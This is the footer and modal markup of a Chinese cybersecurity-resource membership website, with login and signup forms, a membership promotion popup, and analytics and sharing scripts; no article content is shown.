                </span><a class="float-btn service-wechat hover-show nowave" title="扫码添加微信" href="javascript:;"><i class="fa fa-wechat"></i><div class="hover-show-con dropdown-menu"><img class="radius4 relative" width="100%" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/07/20250709061853399.jpg"  alt="扫码添加微信-棉花糖会员站"></div></a><span class="float-btn qrcode-btn hover-show service-wechat"><i class="fa fa-qrcode"></i><div class="hover-show-con dropdown-menu"><div class="qrcode" data-size="100"></div><div class="mt6 px12 muted-color">在手机上浏览此页面</div></div></span><a class="float-btn ontop fade" data-toggle="tooltip" data-placement="left" title="返回顶部" href="javascript:(scrollTopTo());"><i class="fa fa-angle-up em12"></i></a></div><div mini-touch="nav_search" touch-direction="top" class="main-search fixed-body main-bg box-body navbar-search nopw-sm"><div class="container"><div class="mb20"><button class="close" data-toggle-class data-target=".navbar-search" ><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button></div><div remote-box="https://vip.bdziyi.com/wp-admin/admin-ajax.php?action=search_box" load-click><div class="search-input"><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k2"></p>
        <p class="placeholder t1"></p><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k1"></p><p class="placeholder t1"></p><p></p>
        <p class="placeholder k1" style="height: 80px;"></p>
        </div></div></div></div>    <div class="modal fade" id="u_sign" tabindex="-1" role="dialog">
        <div class="modal-dialog" role="document">
            <div class="sign-content">
                <div class="sign-img absolute hide-sm"><img class="fit-cover radius8 lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://oss.bdziyi.com/vip/2024/04/20240411155954828.jpg" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库"></div>                <div class="sign zib-widget blur-bg relative">
                    <button class="close" data-dismiss="modal">
                        <svg class="ic-close" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-close"></use></svg>                    </button>
                    <div class="text-center"><div class="sign-logo box-body"><img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" switch-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库" class="lazyload"></div></div>                    <div class="tab-content"><div class="tab-pane fade active in" id="tab-sign-in"><div class="box-body"><div class="title-h-left fa-2x">登录</div><a class="muted-color px12" href="#tab-sign-up" data-toggle="tab">没有账号？立即注册<i class="em12 ml3 fa fa-angle-right"></i></a></div><div id="sign-in"><form><div class="relative line-form mb10"><input type="text" name="username" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">用户名或邮箱</div></div><div class="relative line-form mb10"><input type="password" name="password" class="line-form-input" tabindex="2" placeholder=""><div class="scale-placeholder">登录密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 em09"><span class="muted-color form-checkbox"><input type="checkbox" id="remember" checked="checked" tabindex="4" name="remember" value="forever"><label for="remember" class="ml3">记住登录</label></span><span class="pull-right muted-2-color"><a rel="nofollow" class="muted-2-color" href="https://vip.bdziyi.com/user-sign-6/?tab=resetpassword&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2491%2F">找回密码</a></span></div><div class="box-body"><input type="hidden" name="action" value="user_signin"><button type="button" class="but radius jb-blue padding-lg signsubmit-loader btn-block"><i class="fa fa-sign-in mr10"></i>登录</button></div></form><p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2491%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div><div class="muted-color mt10 text-center px12 opacity8">使用社交账号登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div><div class="tab-pane fade" id="tab-sign-up"><div class="box-body"><div class="title-h-left fa-2x">注册</div><a class="muted-color px12" href="#tab-sign-in" data-toggle="tab">已有账号，立即登录<i class="em12 ml3 fa fa-angle-right"></i></a></div><form id="sign-up"><div class="relative line-form mb10"><input type="text" name="name" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">设置用户名</div></div><div class="relative line-form mb10"><input change-show=".change-show" type="text" name="email" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">邮箱</div></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 change-show"><input type="text" name="captch" class="line-form-input" autocomplete="off" tabindex="2" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">验证码</div><span class="yztx abs-right"><button type="button" form-action="signup_captcha" class="but c-blue captchsubmit">发送验证码</button></span><div class="abs-right match-ok muted-color"><i class="fa-fw fa fa-check-circle"></i></div><input type="hidden" name="captcha_type" value="email"><input type="hidden" id="_wpnonce" name="_wpnonce" value="37add073fc" /></div><div class="relative line-form mb10"><input type="password" name="password2" class="line-form-input" tabindex="3" placeholder=""><div class="scale-placeholder">设置密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="relative line-form mb10"><input type="password" name="repassword" class="line-form-input" tabindex="4" placeholder=""><div class="scale-placeholder">重复密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="box-body"><input type="hidden" name="action" value="user_signup"><button type="button" class="but radius jb-green padding-lg signsubmit-loader btn-block"><svg class="icon mr10" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-signup"></use></svg>注册</button><div class="form-checkbox muted-color mt10 text-center px12 opacity8"><input name="user_agreement" id="user_agreement" type="checkbox"><label for="user_agreement" class="px12 ml6" style="font-weight:normal;">已阅读并同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></label></div></div></form></div><div class="tab-pane fade" id="tab-qrcode-signin"><div class="box-body"><div class="title-h-left fa-2x">扫码登录</div><span class="muted-3-color px12">使用<a class="muted-color" href="#tab-sign-in" data-toggle="tab">其它方式登录</a>或<a class="muted-color" href="#tab-sign-up" data-toggle="tab">注册</a></span><a class="muted-color px12 hide" href="#tab-qrcode-signin" data-toggle="tab">扫码登录</a></div><div class="qrcode-signin-container box-body text-center"><p class="placeholder" style="height:180px;width:180px;margin:auto;"></p><p class="placeholder" style="height:27px;width:200px;margin:15px auto 0;"></p></div><div class="muted-color mt10 text-center px12 opacity8">扫码登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div>                </div>
            </div>
        </div>
    </div>
<div class="modal fade" id="rewards-modal-1" tabindex="-1" role="dialog"><div class="modal-dialog modal-mini rewards-popover" style="" role="document"><div class="modal-content"><div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-blue"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><i class="loading"></i></div></div></div><div class="modal-body"><ul class="flex jse mb10 text-center rewards-box"><li><p class="placeholder s1"></p><div class="rewards-img"> <h4 class="placeholder fit-cover"></h4></div></li> <li><p class="placeholder s1"></p><div class="rewards-img"> <h4 class="placeholder fit-cover"></h4></div></li></ul></div></div></div></div></div>    <div class="modal fade" id="modal-system-notice" tabindex="-1" role="dialog">
        <div class="modal-dialog                                                                                                                                                                         modal-mini"
            style="" role="document">
            <div class="modal-content">
                <div class="modal-body">
                    <div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-yellow"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></div><div class="mt10 em12 padding-w10">会员低价促销中~</div></div></div><div><body>
<p style="color: orange;">网安全量靶场无境上线，全网最便宜独立环境靶场！</p>
<p style="color: orange;">独家代码审计、凌风云自助获取、ICP信息批量查询等功能已上线</p>
<p style="color: green;">网络安全从拥有一个资源大全开始！</p>
<p style="color: orange;">现在购买仅需99元一年！续费还享八折！</p>
</body>
</div></div>                </div>
                <div class="modal-buts box-body notop text-right"><a type="button" target=_blank class="but radius c-blue" href="http://s.mrw.so/6XqGa">详细介绍</a><a type="button" class="but radius c-green" href="https://vip.bdziyi.com/index.php/user-sign/">注册登陆</a></div>            </div>
        </div>
    </div>
<script type="text/javascript">window.onload = function(){
        setTimeout(function () {$('#modal-system-notice').modal('show');
        $.cookie("showed_system_notice","showed", {path: "/",expires: 1});
    }, 500)};</script>    <script>
        jQuery(document).ready(function ($) {
            function handleAgreementSubmission() {
                var _user_agreement_auths = $('.auth-apply-from [name="user_agreement_auths"]');

                if (_user_agreement_auths.length && !_user_agreement_auths.is(':checked')) {
                    var _user_agreement_auths_box = _user_agreement_auths.closest('.form-check');
                    _user_agreement_auths_box.addClass('ani shake');
                    setTimeout(function () {
                        _user_agreement_auths_box.removeClass('ani shake');
                    }, 400);

                    notyf('请先阅读并同意协议', 'danger');
                    // 禁用按钮1秒后恢复
                    $('.but.c-blue').prop('disabled', true);
                    setTimeout(function() {
                        $('.but.c-blue').prop('disabled', false);
                    }, 1000);
                } else {
                    // 启用按钮（可选，根据需要）
                    $('.but.c-blue').prop('disabled', false);
                }
            }

            $('body').on('click', '.but-average.modal-buts .but.c-blue', function () {
                handleAgreementSubmission();
            });
        });
    </script>
    <script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/js/libs/bootstrap.min.js?ver=8.3" id="bootstrap-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/js/loader.js?ver=8.3" id="_loader-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/inc/functions/bbs/assets/js/main.min.js?ver=8.3" id="forums-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/inc/functions/shop/assets/js/main.min.js?ver=8.3" id="shop-js"></script>
<script type="text/javascript">var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?b1d5fe7471881173b0b5a05d2c916139";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var links = document.querySelectorAll('.item-tags a');

for (var i = 0; i < links.length; i++) {
  var randomColor;
  do {
    var r = Math.floor(Math.random() * 128) + 128;
    var g = Math.floor(Math.random() * 128) + 128;
    var b = Math.floor(Math.random() * 128) + 128;
    randomColor = 'rgb(' + r + ',' + g + ',' + b + ')';
  } while ((r * 0.299 + g * 0.587 + b * 0.114) > 200); // 确保亮度不超过200

  links[i].style.backgroundColor = randomColor;
}

//视频
$(document).ready(function() {
    $('#xiayg').on('click', function() {
        var $videoElement = $('.dplayer-video-wrap .dplayer-video.dplayer-video-current');

        if ($videoElement.length) {
            $videoElement.attr('src', 'https://api.86512.cn/api/web.php');
            $videoElement[0].load();
            $videoElement[0].play();
        } else {
            console.error('找不到视频元素');
        }
    });
});
</script>    <!--baidu_push_js-->
    <script type="text/javascript">
        (function() {
            var bp = document.createElement('script');
            var curProtocol = window.location.protocol.split(':')[0];
            if (curProtocol === 'https') {
                bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
            } else {
                bp.src = 'http://push.zhanzhang.baidu.com/push.js';
            }
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(bp, s);
        })();
    </script>
    <!--baidu_push_js-->
    <script type="text/javascript">
        console.log("数据库查询：28次 | 页面生成耗时：849.118ms");
    </script>
<script type="text/javascript">
    window.WeChatShareDate = {
        appId: 'wx8c358971b57c3409',
        timestamp: '1766510383',
        nonceStr: 'T5pa9MXB22NCLF0U',
        signature: '51b38a82414daeefad213400fd3ee483a296b635',
        url: 'https://vip.bdziyi.com/2491/',
        title: '',
        img: 'https://oss.bdziyi.com/vip/2024/03/20240324075052980.jpg',
        desc: '',
    }
</script>
        <script type="text/javascript">_win.signin_wx_priority = true;</script>
</body>
</html>
<!-- Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com -->